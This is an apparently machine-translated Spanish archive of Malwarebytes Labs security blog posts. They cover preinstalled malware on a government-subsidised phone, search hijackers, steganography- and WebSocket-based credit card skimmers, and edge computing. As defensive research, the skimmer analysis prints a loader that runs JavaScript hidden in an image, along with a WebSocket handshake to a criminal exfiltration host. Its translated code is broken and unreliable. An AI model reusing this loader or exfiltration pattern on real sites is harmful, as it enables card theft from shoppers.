Archivo anual 2020

Pormalwarebytes

Una semana en seguridad informatica (del 6 al 12 de enero de 2020)

Una semana en seguridad (del 6 al 12 de enero)

Una semana en seguridad (del 6 al 12 de enero)

Al corriente: por 

La semana pasada en Malwarebytes Labs, les dijimos a los lectores cómo verificar la seguridad de los sitios web y sus archivos relacionados , exploramos el comportamiento sombrío que tiene lugar dentro de la industria de búsqueda de miles de millones de dólares , desglosamos las seis principales formas en que los piratas informáticos se dirigen a las empresas minoristas y ponen un foco en la familia de ransomware Phobos .

También revelamos una nueva historia importante cuando descubrimos que se está enviando un teléfono móvil subsidiado por el gobierno con malware preinstalado e inamovible .  

Otras noticias de ciberseguridad

Pormalwarebytes

Los teléfonos financiados por el gobierno de los Estados Unidos vienen preinstalados con malware inamovible

Los teléfonos financiados por el gobierno de los Estados Unidos vienen preinstalados con malware inamovible

Los teléfonos financiados por el gobierno de los Estados Unidos vienen preinstalados con malware inamovible

Al corriente: por 
Última actualización:

Un operador de telefonía móvil financiado por los Estados Unidos que ofrece teléfonos a través del programa Lifeline Assistance está vendiendo un dispositivo móvil preinstalado con no una, sino dos aplicaciones maliciosas. Assurance Wireless de Virgin Mobile ofrece el teléfono UMX U686CL como su opción más económica. Con solo $ 35 bajo el programa financiado por el gobierno, es una oferta atractiva. Sin embargo, lo que viene instalado es espantoso.

No solo malicioso, sino preinstalado

En octubre de 2019, vimos varias quejas en nuestro sistema de soporte de usuarios con un teléfono emitido por el gobierno que informaba que algunas de sus aplicaciones preinstaladas eran maliciosas. Compramos un UMX U686CL para ayudar mejor a nuestros clientes y verificar sus reclamos.

Informamos a Assurance Wireless de nuestros hallazgos y les preguntamos en blanco por qué un proveedor de servicios móviles financiado por los Estados Unidos está vendiendo un dispositivo móvil infectado con malware preinstalado. Después de darles el tiempo adecuado para responder, desafortunadamente nunca tuvimos respuesta. Esto es lo que descubrimos.

La primera aplicación cuestionable que se encuentra en el UMX U686CL se presenta como un actualizador llamado Actualización inalámbrica. Sí, es capaz de actualizar el dispositivo móvil. De hecho, es la única forma de actualizar el sistema operativo (SO) del dispositivo móvil. Por el contrario, también es capaz de instalar aplicaciones automáticamente sin el consentimiento del usuario.

Por lo tanto, detectamos esta aplicación como Android / PUP.Riskware.Autoins.Fota.fbcvd , un nombre de detección que debería ser familiar para Malwarebytes para los clientes de Android. Esto se debe a que la aplicación es en realidad una variante de Adups , una compañía con sede en China que fue atrapada recolectando datos de usuarios, creando puertas traseras para dispositivos móviles y, sí, desarrollando instaladores automáticos.

Desde el momento en que inicia sesión en el dispositivo móvil, Wireless Update inicia la instalación automática de aplicaciones. Para repetir: no se ha obtenido el consentimiento del usuario para hacerlo, no hay botones para hacer clic para aceptar las instalaciones, solo instala las aplicaciones por sí mismo. Si bien las aplicaciones que instala están inicialmente limpias y libres de malware, es importante tener en cuenta que estas aplicaciones se agregan al dispositivo con cero notificaciones o permisos requeridos por el usuario. Esto abre la posibilidad de que el malware se instale sin saberlo en una actualización futura de cualquiera de las aplicaciones agregadas por Wireless Update en cualquier momento. 

No solo preinstalado, sino inamovible

Con gran frustración debo escribir sobre otra aplicación maliciosa preinstalada inamovible que se encuentra en el teléfono UMX U686CL: la propia aplicación de configuración del dispositivo móvil funciona como un malware muy ofuscado que detectamos como Android / Trojan.Dropper.Agent.UMX . Debido a que la aplicación sirve como el tablero desde el cual se cambia la configuración, eliminarla dejaría el dispositivo inutilizable.

Android / Trojan.Dropper.Agent.UMX comparte características con otras dos variantes de cuentagotas de troyanos móviles conocidos. La primera característica es que usa los mismos nombres de receptor y servicio. El nombre del receptor termina con ALReceiver y el nombre del servicio termina con ALAJobService. Estos nombres solos son demasiado genéricos para hacer una correlación sólida. Pero, junto con el hecho de que el código es casi idéntico, y podemos confirmar con confianza una coincidencia. 

La única diferencia entre los dos códigos son sus nombres de variables. La variante más perceptible de este malware utiliza caracteres chinos para nombres de variables. Por lo tanto, podemos suponer que el origen de este malware es China.

Variante de malware con nombres de variables chinas

La segunda característica que comparte es que contiene una cadena codificada dentro del código. La decodificación de esta cadena revela un archivo de biblioteca oculto llamado com.android.google.bridge.LibImp.

Cadena decodificada con
com.android.google.bridge.LibImp

Tomemos un tiempo para ver cómo fluye el código mientras decodifica com.android.google.bridge.LibImp . Primero toma la cadena codificada y decodifica usando la decodificación Base64.

Cadena codificada
Decodificación Base64

Luego carga la biblioteca decodificada en la memoria usando DexClassLoader .

DexClassLoader cargando cadena decodificada

Una vez que la biblioteca se carga en la memoria, suelta otra pieza de malware conocida como Android / Trojan.HiddenAds .

Aunque todavía tenemos que reproducir la caída de malware adicional, nuestros usuarios han informado que, de hecho, una variante de HiddenAds se instala repentinamente en su dispositivo móvil UMX.

El origen del malware

Además de que el malware es de origen chino, cabe mencionar que este dispositivo móvil UMX también está hecho por una empresa china. Esto podría ser simplemente una coincidencia en lugar de un descontento explícito: no podemos confirmar si los fabricantes del dispositivo saben que hay malware chino preinstalado.

Sin resolución actual

Aunque tenemos una manera de desinstalar aplicaciones preinstaladas para los usuarios actuales de Malwarebytes , hacerlo en el UMX tiene consecuencias. Desinstale la Actualización inalámbrica y podría perderse actualizaciones críticas para el sistema operativo. Creemos que vale la pena el compromiso, y sugerimos hacerlo. 

Pero desinstale la aplicación de Configuración , y acaba de hacerse un peso de papel caro. Ofrecemos un intento de remediar dicho malware preinstalado en nuestro blog: El nuevo panorama del malware móvil preinstalado: código malicioso dentro . Ver sección: Intentando remediar.

El malware preinstalado empeora, como se anunció

Como he destacado en este blog y blogs anteriores, el malware preinstalado sigue siendo un flagelo para los usuarios de dispositivos móviles. Pero ahora que hay un dispositivo móvil disponible para su compra a través de un programa financiado por el gobierno de los EE. UU., Esto en adelante eleva (o reduce, como quiera que lo vea) el obstáculo sobre el mal comportamiento de las empresas de desarrollo de aplicaciones.

Budget no debe dictar si un usuario puede permanecer seguro en su dispositivo móvil. Descarta miles por un iPhone y escapa de la malicia preinstalada. ¿Pero utiliza fondos con ayuda del gobierno para comprar un dispositivo y pagar el precio en malware? Ese no es el tipo de existencia libre de malware que imaginamos en Malwarebytes.

Palabras finales sobre UMX U686CL

Con un UMX U686CL real en mis manos, puedo decirte que no es un teléfono malo. Se siente sólido en la mano y funciona sin problemas. Claro, no es el dispositivo móvil más rápido, pero es un teléfono inteligente totalmente capaz. En general, sin el malware, este dispositivo es una buena opción para cualquier persona con un presupuesto. 

Es importante darse cuenta de que UMX no está solo. Hay muchos informes de fabricantes de presupuesto que vienen preinstalados con malware, y estos informes están aumentando en número. Aunque no tengo la respuesta a este problema generalizado, puedo decir que los ciudadanos estadounidenses que usan el Programa de Asistencia Lifeline y muchos otros con un presupuesto ajustado merecen más.

Pormalwarebytes

La industria de motores de búsqueda de miles de millones de dólares atrae buitres, anunciantes turbios y cibercriminales.

La industria de motores de búsqueda de miles de millones de dólares atrae buitres, anunciantes turbios y cibercriminales.

La industria de motores de búsqueda de miles de millones de dólares atrae buitres, anunciantes turbios y cibercriminales.

Al corriente: por 

Los motores de búsqueda ganan dinero mostrando a los usuarios anuncios patrocinados: mucho dinero. Esto atrae la atención, la competencia y muchos que quieren una parte de la acción sin hacer el trabajo real o sin considerar el impacto para aquellos en el otro extremo de la barra de búsqueda. Porque en el negocio de búsqueda, incluso las migas son interesantes.

En esta publicación, analizamos las formas en que los anunciantes turbios, los ciberdelincuentes y otros buitres intentan desviar las ganancias del negocio de los motores de búsqueda utilizando tácticas tecnológicas engañosas que finalmente perjudican a los usuarios más que a los propios motores de búsqueda.

¿Cómo ganan dinero los motores de búsqueda exactamente?

Cada vez que alguien hace clic en un anuncio patrocinado, el motor de búsqueda requerido gana dinero en función de pago por clic. Son pagados por los anunciantes, que desembolsan una ubicación beneficiosa en los resultados de búsqueda de las palabras clave de su elección.

Como resultado de la popularidad de estos motores de búsqueda, en particular Google, las empresas estadounidenses gastan aproximadamente $ 80 mil millones en optimización de motores de búsqueda (SEO) solamente. Y los principales motores de búsqueda son propiedad de algunas de las empresas de tecnología más valiosas.

Motor de búsqueda predeterminado

Saber esto puede hacer que sea más fácil entender por qué los secuestradores de navegador están tan interesados ​​en cambiar el motor de búsqueda predeterminado en su navegador favorito. Obtienen un pedazo del pastel para referencias, y esto los incita a usar varios métodos para que sus búsquedas se ejecuten entre sus manos. Si un secuestrador logra cambiar su motor de búsqueda predeterminado por el suyo, puede beneficiarse de sus búsquedas.

Pero hay otras formas rentables de interferir con los resultados de búsqueda:

  • Las nuevas pestañas son secuestradores del navegador que abren una nueva pestaña con un sitio o página establecida por el secuestrador. Estas páginas generalmente contienen una barra de búsqueda. El objetivo es lograr que el usuario ingrese sus consultas en ese formulario de búsqueda en lugar de buscar desde la barra de direcciones, que aún apuntaría al motor de búsqueda predeterminado.
  • Los secuestradores de la página de inicio cambian la página de inicio del navegador afectado por las mismas razones que las pestañas nuevas, solo en diferentes navegadores.
  • Los secuestradores de páginas de búsqueda son en su mayoría extensiones de navegador que pueden leer y cambiar los datos en varios sitios web. En estos casos, los sitios web son los principales motores de búsqueda. Los secuestradores de búsqueda vienen en algunos sabores principales:
    • Los redireccionamientos de los principales motores de búsqueda se ven obligados a un sitio propiedad del secuestrador. A veces, los resultados se mostrarán allí, pero a veces se le devuelve con solo una referencia agregada a su consulta. Las referencias son lo que paga a los secuestradores.
    • Los resultados patrocinados se agregan a los resultados recuperados por los principales motores de búsqueda y, a veces, se presentan como si estuviera utilizando un motor de búsqueda completamente nuevo. En otras ocasiones, los cambios son tan mínimos que nunca se notará.
    • Los resultados patrocinados se agregan a los resultados de los principales motores de búsqueda y se presentan como si fueran los resultados originales.
    • Las búsquedas redirigidas ocurren desde un motor de búsqueda principal a otro motor de búsqueda. El secuestrador alimenta su consulta a otro motor y agrega su referencia sobre la marcha.

Cada uno de los métodos anteriores está en uso por las principales familias de programas potencialmente no deseados (PUP) y adware . Si bien ninguna de estas categorías de amenazas se considera malware, inhiben la capacidad de los usuarios de ver resultados de búsqueda limpios y originales utilizando el motor de su elección, lo que finalmente interfiere en su experiencia en línea.

Métodos más invasivos para beneficiarse de los resultados de búsqueda

Al ver el potencial de ganancias inesperadas, los PUP y el adware han encontrado otras formas más invasivas de ganar dinero con sus búsquedas, métodos que interfieren con los resultados mostrados. Éstos incluyen:

  • Cambiadores de resultados de búsqueda que brindan a los sitios de pago una mejor posición sin revelar que se les paga.
  • SEO pois Ning que adquiere artificialmente un mejor rango de página.
  • Fraude publicitario , que engaña a los anunciantes haciéndoles creer que han mostrado su anuncio en las máquinas afectadas, mientras que el usuario de dicha máquina puede no haber notado nada en absoluto.

El rango de página describe qué tan alto en los resultados de búsqueda aparece su entrada. Cuanto más alto, mejor es el consenso general, pero seguramente querrás estar en la primera página. Si las personas detectan un resultado de búsqueda que probablemente cumpla su búsqueda de conocimiento en la primera página de resultados, generalmente hacen clic en ese enlace antes de molestarse en mirar las otras páginas de resultados. Se sabe que muchos siguen el primer enlace debajo de los resultados patrocinados.

¿Cómo se logra un buen rango de página? Los motores de búsqueda utilizan muchos algoritmos diferentes para decidir el orden en que se muestran los resultados, pero uno de los criterios principales es tener muchos enlaces entrantes a la página web, con el entendimiento de que los enlaces de sitios acreditados tienen un mayor peso.

El envenenamiento de SEO es difícil de hacer en los principales motores de búsqueda: han visto todos los trucos del libro y están atentos a prohibir esas tácticas lo más rápido posible. Entonces, si abusa de la posición de ser marcado como un sitio de buena reputación, puede perderlo mucho más rápido de lo que lo ganó. Solo generará efectos a corto plazo, lo que funciona para aquellos que buscan dinero rápido, pero no para negocios a largo plazo.

Extensiones de privacidad falsas

Hay muchas formas de realizar cambios en los motores de búsqueda y en los resultados de búsqueda en un sistema afectado con PUP o adware, pero el método más popular es seducir a las víctimas para que instalen una extensión del navegador que promete algún tipo de funcionalidad.

Es típico ver secuestradores de búsqueda que prometen proteger su privacidad en línea o actuar como un bloqueador de anuncios , ya que ambos complementos requieren que los usuarios les otorguen permiso para ver o tener control sobre una amplia gama de datos y configuraciones de computadora. Debido a esto, es importante que los usuarios examinen exhaustivamente las posibles extensiones de privacidad y bloqueadores de anuncios antes de descargar.

Secuestradores de ejemplo

Permítanos mostrarle algunos ejemplos de los diferentes secuestradores de búsqueda y los permisos que necesitan para realizar su trabajo sucio. Usaré las solicitudes de permisos solo para las extensiones de Chrome, pero la mayoría de estos secuestradores también existen en el ámbito de Firefox.

Ejemplo 1 : cambio de búsqueda predeterminada

cambiar la configuración de búsqueda

Se cambiará la configuración de búsqueda predeterminada, que es una bandera roja. Este tipo de extensión generalmente le promete alguna funcionalidad que explica la necesidad de dicho permiso.

Ejemplo 2 : cambio de resultados

cambiar los resultados de los principales motores de búsqueda

Cambiar sus datos en este caso significa que alterarán los resultados de búsqueda de los tres motores de búsqueda principales: Bing, Google y Yahoo. El cuarto listado es para el origen de esta extensión.

Ejemplo 3 : Agregar una barra de búsqueda en la nueva pestaña:

cambiar la pestaña nueva a algo con un formulario de búsqueda

La página que se muestra cuando abre una nueva pestaña contendrá un formulario de búsqueda que conduce al sitio de búsqueda que pertenece a la extensión.

Ejemplo 4 : el fregadero de la cocina

cambia la configuración y la nueva pestaña

Esta extensión cambia la pestaña nueva y la búsqueda predeterminada; un ataque de múltiples vectores, por así decirlo. También requiere otros permisos, como leer el historial de navegación y administrar descargas, de los que me alejaría por razones de privacidad.

Ejemplo 5 : Agregar resultados patrocinados a sus resultados de Google:

agrega resultados patrocinados a Google

Este obtiene los resultados de Google y luego agrega un pequeño encabezado y un montón de resultados patrocinados.

Indicador de flujo de surf
Esto se mostrará junto a los resultados patrocinados.

Los ladrones de motores de búsqueda son difíciles de encontrar

Vemos muchas quejas de personas que se preguntan qué causó el cambio de su experiencia de búsqueda y cómo. La mayoría de las veces, se debe a una extensión como los ejemplos mostrados anteriormente. Muchas personas no se dan cuenta de que las extensiones son las culpables porque se instalaron por una razón diferente, a veces incluso de una fuente confiable o como parte de un paquete, a veces pretendiendo no instalarlas . Pero leer entre líneas de letra pequeña en esas solicitudes de permiso, o simplemente leerlas, puede darle una idea de cómo su motor de búsqueda y la experiencia del navegador se enredaron en PUP y adware.

Esperamos que esta publicación (y un escaneo de un programa antivirus de buena reputación como Malwarebytes o Browser Guard ) ayude a resolver esos problemas en el futuro.

Pormalwarebytes

Nuevas técnicas de evasión encontradas en skimmers web

Nuevas técnicas de evasión encontradas en skimmers web

Nuevas técnicas de evasión encontradas en skimmers web

Al corriente: por 
Última actualización:

Durante varios años, los delincuentes han podido robar datos de tarjetas de crédito de compradores en línea sin darse cuenta sin llamar demasiado la atención. Pocas personas en la industria de la seguridad estaban hablando de estos skimmers web de tarjetas de crédito, tanto del lado del servidor como del lado del cliente, antes de que este último se conociera en gran medida como Magecart .

Se necesitaron algunos incidentes importantes, en particular las infracciones de Ticketmaster y British Airways , para poner esta creciente amenaza bajo el foco de atención y finalmente crear conciencia entre los comerciantes y consumidores en línea.

Bajo la presión de un mayor escrutinio, en particular por parte de varios investigadores de seguridad, algunos actores de amenazas comenzaron a desarrollar su habilidad. Esta es una reacción natural, no limitada a los skimmers web, sino que se aplica a cualquier empresa maliciosa, cibernética o no.

Una de estas evoluciones recientes incluye dos nuevas técnicas de evasión adaptadas para los skimmers web del lado del cliente utilizados para ocultar su actividad fraudulenta.

Esteganografía: una imagen que vale más que mil secretos

Los autores de malware han utilizado la esteganografía durante mucho tiempo como una forma de ocultar datos dentro de imágenes de aspecto legítimo. En 2014, describimos una nueva variante del troyano bancario Zeus llamado ZeusVM , que ocultaba sus datos de configuración dentro de una imagen de una hermosa puesta de sol.

En el contexto de la seguridad del sitio web, ocultar código malicioso en archivos de imagen es una excelente manera de pasar desapercibido. Tomemos, por ejemplo, un sitio web de comercio electrónico y los diversos componentes que carga, muchos de ellos serán logotipos, imágenes de productos, etc.

El 26 de diciembre, @AffableKraut reveló el primer skimmer de tarjetas de crédito basado en esteganografía documentado públicamente. A simple vista, la imagen se ve como una cinta típica de envío gratuito que comúnmente se ve en los sitios de compras.

Figura 1: un logotipo de envío gratuito que se encuentra en un sitio de compras

La única indicación de que puede haber algo mal es el hecho de que el archivo está mal formado, con datos adicionales encontrados después del final normal del archivo.

Para comprender mejor qué y dónde podrían estar estos datos, podemos mirar la imagen en un editor hexadecimal. El formato de intercambio de archivos ( JFIF ) para la codificación JPEG tiene una estructura específica. Utilizamos el diagrama de Ange Albertini como guía.

Figura 2: Observando la estructura de la imagen desde el comienzo del archivo

Hasta ahora, la imagen cumple con sus requisitos, y no parece tener nada de especial. Sin embargo, si recordamos lo que vimos en la Figura 1, se agregaron datos adicionales después del segmento final, que tiene el marcador FF D9.

Figura 3: Observando la estructura de la imagen, después del final normal del archivo

Ahora podemos ver el código JavaScript que comienza inmediatamente después del final del marcador de archivo. Mirando algunas de sus cadenas, como onestepcheckout o authorizenet , podemos deducir de inmediato que este es el código de skimming de la tarjeta de crédito.

Todos los sitios comprometidos que encontramos utilizando un skimmer esteganográfico fueron inyectados con fragmentos de código similares (generalmente después del elemento de pie de página o el Administrador de etiquetas de Google) para cargar la imagen falsa y analizar su contenido de JavaScript a través del método slice () .

var xhr = new XMLHttpRequest (); 
xhr.open ('GET', '[ruta de imagen]', verdadero); 
xhr.send (); 
xhr.onreadystatechange = function () { 
     if (this.readyState! = 4) return; 
     if (this.status == 200) { 
         var F = nueva función (this.responseText.slice (- [número])); 
         retorno (F ()); 
     } 
}

Como sucede, la mayoría de los rastreadores y escáneres web se concentrarán en archivos HTML y JavaScript, y a menudo ignorarán los archivos multimedia, que tienden a ser grandes y ralentizan el procesamiento. ¿Qué mejor lugar para colarse en algún código?

Hace varios años, hubo grandes campañas de publicidad maliciosa que redirigieron a las víctimas al kit de explotación Angler, uno de los kits de herramientas más avanzados que se utiliza para infectar a los usuarios con malware. Un actor de amenazas usó una técnica similar al ocultar el código de huellas digitales dentro de una imagen GIF falsa . En ese momento, esta era la crème de la crème de las técnicas de publicidad maliciosa.

En cierto sentido, cualquier archivo cargado directamente o de un tercero debe considerarse sospechoso. @AffableKraut se vincula a un sistema de escaneo de archivos de código abierto llamado Strelka que puede ser útil para los defensores en la detección de archivos anómalos.

Figura 4: Malwarebytes bloquea un skimmer usando esteganografía

WebSockets en lugar de HTTP

WebSocket es un protocolo de comunicación que permite intercambiar flujos de datos entre un cliente y un servidor a través de una única conexión TCP. Por lo tanto, los WebSockets son diferentes al protocolo HTTP más comúnmente conocido, que consiste en solicitudes y respuestas a un servidor desde un cliente.

Figura 5: Comparación de los protocolos WebSocket y HTTP

Si bien los WebSockets son ventajosos para la transferencia de datos en tiempo real, esta no es la razón por la cual los actores de amenazas pueden estar interesados ​​en ellos. Para su caso de uso particular, WebSockets proporciona una forma más encubierta de intercambiar datos que las solicitudes-respuestas HTTP típicas.

Con los skimmers web, hay ciertos artefactos que buscamos:

  • Código de skimmer inyectado directamente en un sitio comprometido (JavaScript en el DOM)
  • Código de skimmer cargado desde recursos externos (etiqueta de script con atributo src)
  • Exfiltración de los datos robados (solicitudes HTTP GET o HTTP POST con datos codificados)

Sin embargo, WebSockets ofrece otra forma de intercambiar datos, como lo encontró @AffableKraut . El primer componente es el código de descremado en sí, seguido de la exfiltración de datos.

Los atacantes necesitan cargar un nuevo WebSocket y eso se puede detectar en el DOM. Sin embargo, fueron inteligentes para ofuscar el código lo suficientemente bien como para que se mezcle por completo.

Figura 6: Código malicioso que carga secretamente el WebSocket

El objetivo es ocultar una conexión a un servidor controlado por los delincuentes a través de un WebSocket. Una vez que este código JavaScript se ejecuta en el navegador, activará la siguiente solicitud de protocolo de enlace de cliente:

OBTENGA https://tawktalk.com/modernize/css/ HTTP / 1.1 
Host: tawktalk.com 
Conexión: Actualización 
Pragma: sin caché 
Control de caché: sin caché 
Agente de usuario: {eliminado} 
Actualización: websocket 
Origen: https: //www.{removed}.com 
Sec-WebSocket-Version: 13 
Accept-Encoding: gzip, deflate, br 
Accept-Language: en-US, en; q = 0.9 
Sec-WebSocket-Key: {eliminado} 
Sec-WebSocket -Extensiones: permessage-deflate; client_max_window_bits

Seguirá la respuesta de protocolo de enlace del servidor:

HTTP / 1.1 101 Protocolos de conmutación 
Servidor: nginx / 1.12.2 
Fecha: {eliminado} 
Conexión: actualización 
Actualización: websocket 
Sec-WebSocket-Accept: {eliminado} 
EndTime: {eliminado} 
ReceivedBytes: 22296 
SentBytes: 57928

Una vez establecido esto, se intercambiará una serie de mensajes bidireccionales entre el cliente (navegador de la víctima) y el servidor (host malicioso). Una propagación codificada Base64 más grande se descarga en el cliente y se procesa como código JavaScript. Esto resulta ser el código de skimming de la tarjeta de crédito.

Figura 7: Los mensajes de WebSocket, descargando el skimmer y luego filtrando datos CC

Los siguientes mensajes más pequeños son intentos de exfiltración de campos de formulario presentes en la página de pago. Los datos se han cifrado para que sea menos obvio. Podemos ver que hay duplicados, al igual que lo que encontramos con algunos skimmers tradicionales que desencadenan la exfiltración en función de un evento de temporizador repetido.

WebSockets también fueron utilizados por otra amenaza web, que en ese momento estaba en los titulares casi a diario: cryptojacking . En este caso, no fue tanto por la ocultación sino por la eficiencia, ya que el proceso de minería en el navegador tuvo que enviar hashes al servidor para cada nuevo trabajo de minería. Sin embargo, notamos el uso de WebSockets junto con servidores proxy para evadir la detección.

Figura 8: Malwarebytes bloquea un skimmer usando WebSockets

Diferentes trucos, misma protección.

Las técnicas descritas en este blog sin duda causarán dolores de cabeza a los defensores y darán a algunos actores de la amenaza tiempo adicional para continuar sus actividades sin ser molestados. Pero como se mencionó anteriormente, este tipo de juego de gato y ratón era de esperar a la luz de nuevas publicaciones regulares sobre Magecart y skimmers web.

Hay otras formas de ocultar y cargar scripts maliciosos. Aunque la tecnología se está retirando, Flash Player a través de ActionScript también fue un gran vehículo para muchas campañas de malware. Por ejemplo, una famosa infraestructura de redirección llamada EITest solía tener un archivo SWF que cargaba un iframe malicioso en un kit de explotación.

Si bien la mayoría de los autores de malware seguirán utilizando métodos tradicionales, los actores más avanzados encontrarán nuevas formas de evadir la detección. Algunas técnicas pueden estar dirigidas a los investigadores, mientras que otras pueden estar destinadas a evitar los rastreadores web.

En Malwarebytes, continuamos monitoreando el cambio en este panorama de amenazas para mantener a nuestros usuarios seguros. La protección contra skimmers web está disponible a través de nuestro software Malwarebytes .

Pormalwarebytes

Una semana en seguridad Informatica (23 y 29 de diciembre)

Una semana en seguridad (23 y 29 de diciembre)

Una semana en seguridad Informatica (23 y 29 de diciembre)

Al corriente: por 

La semana pasada en Malwarebytes Labs, continuamos nuestra cobertura retrospectiva con un vistazo a cómo los legisladores en los Estados Unidos trataron la privacidad en línea este año, encontrando tendencias en múltiples proyectos de ley federales presentados en el Senado . Luego tomamos un pequeño descanso para las vacaciones.

Otras noticias de ciberseguridad:

Pormalwarebytes

¿Que es la computación perimetral?

Explicado: computación de borde

Explicado: computación de borde

Al corriente: por 

La computación perimetral puede parecer un término extraño y orientado al futuro. Sin embargo, sus aplicaciones son amplias y diversas, con la capacidad de transformar la forma en que almacenamos, usamos y compartimos datos y programas en línea. Las implicaciones de la informática de vanguardia son de largo alcance, desde el desarrollo de software y las aplicaciones empresariales hasta la informática cotidiana, incluso en el juego.

Recientemente, seguí una discusión sobre si el rendimiento y los gráficos de los juegos en línea podrían compararse con los de las consolas. Las consolas de juegos suelen proporcionar a los usuarios una acción más rápida, entornos más detallados y movimientos precisos, tiempos de reacción más rápidos y mayor resolución que los juegos en línea.

Mientras que algunos declararon que los juegos en línea nunca podrían estar a la altura, otros notaron que la industria del juego sigue moviendo su enfoque hacia el juego en línea. Redbox , por ejemplo, ha dejado de ofrecer videojuegos físicos en alquiler. Entonces, ¿los jugadores tendrán que cambiar para siempre el rendimiento y la calidad del juego para facilitar su uso? ¿O pueden tener ambos? Si los desarrolladores de juegos quieren hacer realidad este sueño, sin duda implicará la informática de punta.

¿Qué es la computación perimetral?

La computación perimetral es, por definición, un método por el cual el almacenamiento y la computación de datos se realiza más cerca de la ubicación donde se necesita, lo que reduce la latencia y mejora el ancho de banda mientras se utilizan aplicaciones basadas en la nube. Esto puede ser un gran beneficio para aquellos que transmiten videos, abren archivos grandes o juegan juegos en línea. Para lograr esto, podríamos ver Redes de entrega de contenido (CDN) o redes de servidores proxy configuradas en diferentes ubicaciones, combinadas con la funcionalidad de la nube para entregar los datos solicitados casi directamente al usuario.

A medida que más y más aplicaciones se mueven a la nube, el ancho de banda compartido se vuelve cada vez más problemático. Edge computing, entonces, está siendo aclamado como el próximo movimiento en el desarrollo de software y almacenamiento de datos. Expliquemos algunos de los principios básicos de la informática de punta para comprender cómo se aplicará este principio en las tecnologías que conocemos y usamos todos los días.

Latencia en computación

La latencia es el intervalo de tiempo entre una estimulación y la respuesta, o, para simplificar aún más, un retraso de tiempo entre la causa y el efecto de algún cambio físico en el sistema que se observa. La latencia puede ocurrir en el sistema nervioso humano, en la ingeniería mecánica y, por supuesto, en la informática. Cada vez que se observa un búfer de servicio de transmisión, un molinete gira y gira, una página web tarda en cargarse; eso es latencia en pocas palabras.

En ese contexto, la latencia de la red describe la demora que tiene lugar durante la comunicación a través de una red (incluida Internet). La latencia depende principalmente del tipo de conexión y la proximidad del servidor más cercano.

Para una conexión a Internet normal, una latencia de 100 ms (milisegundos) se considera aceptable hoy en día, aunque los usuarios tienen cada vez menos paciencia. Para una buena experiencia de juego, querrás una latencia de 30 ms o menos. En aplicaciones de realidad virtual, cualquier latencia superior a 7 ms produce mareo por movimiento.

Redes de entrega de contenido

Las redes de entrega de contenido (CDN) son sistemas de servidores distribuidos (redes) que entregan contenido web a un usuario en función de su ubicación geográfica, el origen de la página web y el propio servidor de entrega de contenido.

En términos simples, esto significa que la información se copia en servidores de todo el mundo y un usuario obtiene la información del servidor más cercano a él que tiene la información solicitada disponible. Esto también permite que se distribuya contenido geoespecífico para un uso óptimo. Después de todo, tener un EULA holandés en un servidor en Japón no tiene mucho sentido.

Las CDN, como se mencionó anteriormente, proporcionarán una ruta crítica desde los datos almacenados en la nube hasta el usuario, esencialmente haciendo rebotar la información de un único servidor masivo a los servidores más cercanos al intercambio de datos (el contenido web y el usuario).

La nube

Aquí es donde se une la ecuación para la computación de borde, en el borde de la nube. Las CDN por sí solas no pueden lograr entregar todos los datos necesarios para lograr la resolución de la latencia y al mismo tiempo permitir un acceso más fácil. La computación en la nube, entonces, o la entrega de recursos informáticos a pedido, como aplicaciones y centros de datos a través de Internet, completa la fórmula.

Los recursos en la nube a menudo se dividen de tres maneras:

  • Público: los servicios en la nube se brindan a través de Internet y se venden a pedido, lo que brinda a los clientes una gran flexibilidad. Solo pagas por lo que necesitas.
  • Privado: los servicios en la nube se entregan a través de la red comercial desde el centro de datos del propietario. Usted tiene control sobre el hardware, así como la administración y los costos relacionados.
  • Híbrido: una mezcla de lo anterior. Las empresas pueden elegir tener control sobre los datos más confidenciales y utilizar los servicios públicos para cubrir el resto de sus necesidades.

La computación perimetral probablemente emplearía la solución híbrida con una plataforma de nube distribuida, lo que significa que los recursos de la nube se ubican estratégicamente para proporcionar las ubicaciones que tienen las mayores demandas con el más alto nivel de recursos.

Netflix: un caso especial

Teniendo en cuenta las aplicaciones de edge computing, es posible que desee ver los servicios de transmisión de video como beneficiarios. Tal vez sea así algún día, pero en este momento, el nombre más importante del juego, Netflix, ha logrado tiempos de visualización de carga rápida para millones a la vez sin llegar al límite.

Netflix ha crecido para servir a más de 50 millones de suscriptores en 40 países. Para optimizar la experiencia del usuario, Netflix ha llevado la transmisión de video en línea al siguiente nivel al construir su propia CDN, asociarse con ISP en los países atendidos y desarrollar un sistema que adapta la calidad (resolución) del contenido a la latencia de los usuarios ‘conexión. No están empleando técnicas informáticas de vanguardia porque construyeron su propia infraestructura.

Lo que esto significa en la práctica es que Netflix trabaja directamente con los ISP mediante la instalación de cajas llamadas dispositivos de conexión abierta, ya sea en los puntos de intercambio o dentro de los ISP. Estas cajas pueden almacenar hasta 280 Terabytes de video, que contienen todo lo que Netflix tiene para ofrecer en tu cuello de bosque.

Esto realmente significa que, en la mayoría de los casos, se está conectando a Netflix con su propio ISP, siempre que sea uno de los socios de Netflix, lo que resulta en una velocidad máxima y baja latencia. Como un método adicional para evitar el almacenamiento en búfer notable, Netflix puede reducir la calidad de la imagen, lo que resulta en menos píxeles enviados.

Informática de borde

El objetivo de la informática de punta es lograr la resolución, la velocidad y la facilidad de acceso que nos ofrece Netflix, pero sin tener que hacer grandes inversiones en infraestructura. El truco consiste en crear una combinación de soluciones de hardware y recursos en la nube distribuidos que se puedan implementar para que cada usuario final tenga la impresión de que está trabajando localmente.

Cuando se busca una solución informática de vanguardia, es imperativo saber si la demanda seguirá estando más o menos distribuida de la misma manera o si necesitamos más flexibilidad cuando se trata de un uso máximo en diferentes ubicaciones.

Para mantener la combinación de recursos sincronizados con cualquier cambio en la demanda por tamaño y ubicación, necesitaremos alguna solución de software para realizar un seguimiento de la demanda y ajustar la configuración para cumplir con los parámetros establecidos, preferiblemente uno que nos informe de antemano cuando los límites de lo que puede lograr es acercarse a los límites de lo que hemos indicado que es aceptable.

De esta manera, podemos tomar decisiones informadas sobre si necesitamos expandirnos en hardware, desembolsar más para servicios en la nube o comenzar a buscar un mejor software de administración.

Seguridad en la informática de punta

Como es habitual en los campos en rápida evolución, la informática de punta corre el riesgo de implementar medidas de seguridad como una ocurrencia tardía. Es agradable cuando nuestros empleados en oficinas remotas pueden participar como si estuvieran al lado, pero no a costa de filtrar información comercial a lo largo de las líneas de comunicación o en los bordes de nuestra red corporativa.

Suponiendo que tiene la seguridad dentro de sus propios perímetros de red en orden, el siguiente paso lógico sería bloquear el camino de la información hacia y desde la nube, así como los datos almacenados en la nube, todo debe hacerse sin un impacto notable. en la latencia

